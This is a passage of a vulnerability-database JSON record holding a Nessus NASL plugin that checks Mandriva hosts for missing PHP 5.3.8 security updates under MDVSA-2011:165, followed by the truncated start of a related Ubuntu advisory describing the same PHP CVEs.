"p-cpe:/a:mandriva:linux:php-mailparse", "p-cpe:/a:mandriva:linux:php-timezonedb", "p-cpe:/a:mandriva:linux:php-pdo_dblib", "p-cpe:/a:mandriva:linux:php-exif", "p-cpe:/a:mandriva:linux:php-eaccelerator", "p-cpe:/a:mandriva:linux:php-odbc", "p-cpe:/a:mandriva:linux:php-pdo_odbc", "p-cpe:/a:mandriva:linux:php-snmp", "p-cpe:/a:mandriva:linux:php-mysql", "p-cpe:/a:mandriva:linux:php-pspell", "p-cpe:/a:mandriva:linux:php-optimizer", "p-cpe:/a:mandriva:linux:php-gearman", "p-cpe:/a:mandriva:linux:php-apc-admin", "p-cpe:/a:mandriva:linux:php-tclink", "p-cpe:/a:mandriva:linux:php-eaccelerator-admin", "p-cpe:/a:mandriva:linux:php-vld", "p-cpe:/a:mandriva:linux:php-intl", "p-cpe:/a:mandriva:linux:php-filter", "p-cpe:/a:mandriva:linux:php-wddx", "p-cpe:/a:mandriva:linux:php-xattr", "p-cpe:/a:mandriva:linux:php-dba", "p-cpe:/a:mandriva:linux:php-mcrypt", "p-cpe:/a:mandriva:linux:php-shmop", "p-cpe:/a:mandriva:linux:php-suhosin", "p-cpe:/a:mandriva:linux:php-mysqli", "p-cpe:/a:mandriva:linux:php-translit", "p-cpe:/a:mandriva:linux:php-zip"], "id": "MANDRIVA_MDVSA-2011-165.NASL", "href": "https://www.tenable.com/plugins/nessus/56707", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2011:165. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(56707);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-1148\", \"CVE-2011-1657\", \"CVE-2011-1938\", \"CVE-2011-2202\", \"CVE-2011-2483\", \"CVE-2011-3182\", \"CVE-2011-3267\", \"CVE-2011-3268\");\n script_bugtraq_id(46843, 47950, 48259, 49241, 49249, 49252);\n script_xref(name:\"MDVSA\", value:\"2011:165\");\n\n script_name(english:\"Mandriva Linux Security Advisory : php (MDVSA-2011:165)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandriva Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities has been identified and fixed in php :\n\nUse-after-free vulnerability in the substr_replace function in PHP\n5.3.6 and earlier allows context-dependent attackers to cause a denial\nof service (memory corruption) or possibly have unspecified other\nimpact by using the same variable for multiple arguments\n(CVE-2011-1148).\n\nThe (1) ZipArchive::addGlob and (2) ZipArchive::addPattern functions\nin ext/zip/php_zip.c in PHP 5.3.6 allow context-dependent attackers to\ncause a denial of service (application crash) via certain flags\narguments, as demonstrated by (a) GLOB_ALTDIRFUNC and (b) GLOB_APPEND\n(CVE-2011-1657).\n\nStack-based buffer overflow in the socket_connect function in\next/sockets/sockets.c in PHP 5.3.3 through 5.3.6 might allow\ncontext-dependent attackers to execute arbitrary code via a long\npathname for a UNIX socket (CVE-2011-1938).\n\nThe rfc1867_post_handler function in main/rfc1867.c in PHP before\n5.3.7 does not properly restrict filenames in multipart/form-data POST\nrequests, which allows remote attackers to conduct absolute path\ntraversal attacks, and possibly create or overwrite arbitrary files,\nvia a crafted upload request, related to a file path injection\nvulnerability. (CVE-2011-2202).\n\ncrypt_blowfish before 1.1, as used in PHP before 5.3.7 on certain\nplatforms, does not properly handle 8-bit characters, which makes it\neasier for context-dependent attackers to determine a cleartext\npassword by leveraging knowledge of a password hash (CVE-2011-2483).\n\nPHP before 5.3.7 does not properly check the return values of the\nmalloc, calloc, and realloc library functions, which allows\ncontext-dependent attackers to cause a denial of service (NULL pointer\ndereference and application crash) or trigger a buffer overflow by\nleveraging the ability to provide an arbitrary value for a function\nargument, related to (1) ext/curl/interface.c, (2)\next/date/lib/parse_date.c, (3) ext/date/lib/parse_iso_intervals.c, (4)\next/date/lib/parse_tz.c, (5) ext/date/lib/timelib.c, (6)\next/pdo_odbc/pdo_odbc.c, (7) ext/reflection/php_reflection.c, (8)\next/soap/php_sdl.c, (9) ext/xmlrpc/libxmlrpc/base64.c, (10)\nTSRM/tsrm_win32.c, and (11) the strtotime function (CVE-2011-3182).\n\nPHP before 5.3.7 does not properly implement the error_log function,\nwhich allows context-dependent attackers to cause a denial of service\n(application crash) via unspecified vectors (CVE-2011-3267).\n\nBuffer overflow in the crypt function in PHP before 5.3.7 allows\ncontext-dependent attackers to have an unspecified impact via a long\nsalt argument, a different vulnerability than CVE-2011-2483\n(CVE-2011-3268).\n\nThe updated php packages have been upgraded to 5.3.8 which is not\nvulnerable to these issues.\n\nAdditionally some of the PECL extensions has been upgraded and/or\nrebuilt for the new php version.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:apache-mod_php\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64php5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libphp5_common5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-apc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-apc-admin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-eaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-eaccelerator-admin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-filter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gearman\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-hash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mailparse\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mcal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-mysqli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-optimizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_dblib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pdo_sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-phar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pinba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-readline\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sasl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-session\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sphinx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sqlite3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-ssh2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sybase_ct\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-tclink\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-timezonedb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-translit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-vld\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xattr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xdebug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:php-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:linux:2010.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/11/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/11/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK2010.1\", reference:\"apache-mod_php-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"x86_64\", reference:\"lib64php5_common5-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", cpu:\"i386\", reference:\"libphp5_common5-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-apc-3.1.9-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-apc-admin-3.1.9-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-bcmath-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-bz2-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-calendar-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-cgi-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-cli-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-ctype-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-curl-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-dba-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-devel-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-doc-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-dom-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-eaccelerator-0.9.6.1-1.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-eaccelerator-admin-0.9.6.1-1.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-enchant-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-exif-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-fileinfo-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-filter-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-fpm-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-ftp-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-gd-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-gearman-0.7.0-0.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-gettext-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-gmp-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-hash-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-iconv-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-imap-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-intl-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-json-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-ldap-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-mailparse-2.1.5-8.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-mbstring-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-mcal-0.6-35.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-mcrypt-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-mssql-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-mysql-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-mysqli-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-odbc-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-openssl-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-optimizer-0.1-0.alpha2.8.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-pcntl-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-pdo-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-pdo_dblib-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-pdo_mysql-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-pdo_odbc-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-pdo_pgsql-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-pdo_sqlite-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-pgsql-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-phar-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-pinba-0.0.5-2.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-posix-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-pspell-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-readline-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-recode-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-sasl-0.1.0-33.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-session-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-shmop-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-snmp-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-soap-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-sockets-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-sphinx-1.0.4-2.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-sqlite-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-sqlite3-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-ssh2-0.11.2-0.4mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-suhosin-0.9.32.1-0.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-sybase_ct-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-sysvmsg-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-sysvsem-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-sysvshm-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-tclink-3.4.5-7.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-tidy-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-timezonedb-2011.14-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-tokenizer-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-translit-0.6.1-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-vld-0.10.1-1.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-wddx-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-xattr-1.1.0-13.5mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-xdebug-2.1.2-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-xml-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-xmlreader-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-xmlrpc-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-xmlwriter-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-xsl-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-zip-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\nif (rpm_check(release:\"MDK2010.1\", reference:\"php-zlib-5.3.8-0.1mdv2010.2\", yank:\"mdv\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T06:36:46", "description": "Mateusz Kocielski, Marek Kroemeke and Filip Palian discovered that a\nstack-based buffer overflow existed in the socket_connect function's\nhandling of long pathnames for AF_UNIX sockets. A remote attacker\nmight be able to exploit this to execute arbitrary code; however, the\ndefault compiler options for affected releases should reduce the\nvulnerability to a denial of service. This issue affected Ubuntu 10.04\nLTS, Ubuntu 10.10 and Ubuntu 11.04. (CVE-2011-1938)\n\nKrzysztof Kotowicz discovered that the PHP post handler function does\nnot properly restrict filenames in multipart/form-data POST requests.\nThis may allow remote attackers to conduct absolute path traversal\nattacks and possibly create or overwrite arbitrary files. This issue\naffected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10 and Ubuntu\n11.04. (CVE-2011-2202)\n\nIt was discovered that the crypt function for blowfish does not\nproperly handle 8-bit characters. This could make it easier for an\nattacker to discover a cleartext password containing an 8-bit\ncharacter that has a matching blowfish crypt value. This issue\naffected Ubuntu 10.04 LTS, Ubuntu 10.10 and Ubuntu 11.04.\n(CVE-2011-2483)\n\nIt was discovered that PHP did not properly check the return values of\nthe malloc(3), calloc(3) and realloc(3) library functions in multiple\nlocations. This could allow an attacker to cause a denial of service\nvia a NULL pointer dereference or possibly execute arbitrary code.\nThis issue affected Ubuntu 8.04 LTS, Ubuntu 10.04 LTS, Ubuntu 10.10\nand Ubuntu 11.04. (CVE-2011-3182)\n\nMaksymilian Arciemowicz discovered that PHP did not properly implement\nthe error_log function. This could allow an attacker to cause a denial\nof service via an application crash. This issue affected Ubuntu 10.04\nLTS, Ubuntu 10.10, Ubuntu 11.04 and Ubuntu 11.10. (CVE-2011-3267)\n\nMaksymilian Arciemowicz discovered that the ZipArchive 